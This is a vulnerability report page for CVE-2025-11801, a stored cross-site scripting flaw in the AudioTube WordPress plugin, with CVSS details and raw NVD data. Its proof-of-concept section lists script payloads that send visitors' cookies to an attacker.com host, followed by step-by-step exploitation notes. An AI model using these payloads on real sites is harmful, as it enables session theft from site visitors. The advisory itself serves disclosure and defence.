Security Vulnerability Report
中文
CVE-2025-11801 CVSS 6.4 MEDIUM

CVE-2025-11801

Published: 2025-11-21 08:15:51
Last Modified: 2026-04-15 00:35:42

Description

The AudioTube plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'caption' shortcode attribute of the 'audiotube' shortcode in all versions up to, and including, 0.0.3. This is due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

AudioTube插件 0.0.3及以下所有版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-11801 PoC - AudioTube Plugin Stored XSS // Author: Security Researcher // Target: WordPress AudioTube Plugin <= 0.0.3 // Method 1: Via WordPress Shortcode (requires contributor+ access) // Insert this shortcode into any post or page content: [audiotube url='https://example.com/video.mp4' caption='<img src=x onerror=alert(document.cookie)>'] // Method 2: Direct payload examples // The caption parameter accepts unsanitized HTML/JS const payloads = [ "<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>", "<img src=x onerror=fetch('https://attacker.com/log?d='+document.domain)>", "<svg/onload=fetch('https://attacker.com/cookie?c='+btoa(document.cookie))>", "<body onload=document.location='https://attacker.com/xss?c='+document.cookie>", "<iframe src='javascript:alert(document.cookie)'>", "<script>new Image().src='https://attacker.com/?c='+document.cookie</script>" ]; // The injected script will execute for every user visiting the affected page // No user interaction required once the content is published/approved // Exploitation scenario: // 1. Attacker with contributor access creates/edits post // 2. Inserts malicious shortcode with XSS payload in caption attribute // 3. Post is published (may require admin approval depending on user role) // 4. Any user viewing the page executes the injected JavaScript // 5. Attacker receives stolen cookies/session data

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11801", "sourceIdentifier": "[email protected]", "published": "2025-11-21T08:15:51.267", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The AudioTube plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'caption' shortcode attribute of the 'audiotube' shortcode in all versions up to, and including, 0.0.3. This is due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/audiotube/tags/0.0.3/index.php#L64", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/258a2d5d-a176-4b89-bc4c-089d072982dd?source=cve", "source": "[email protected]"}]}}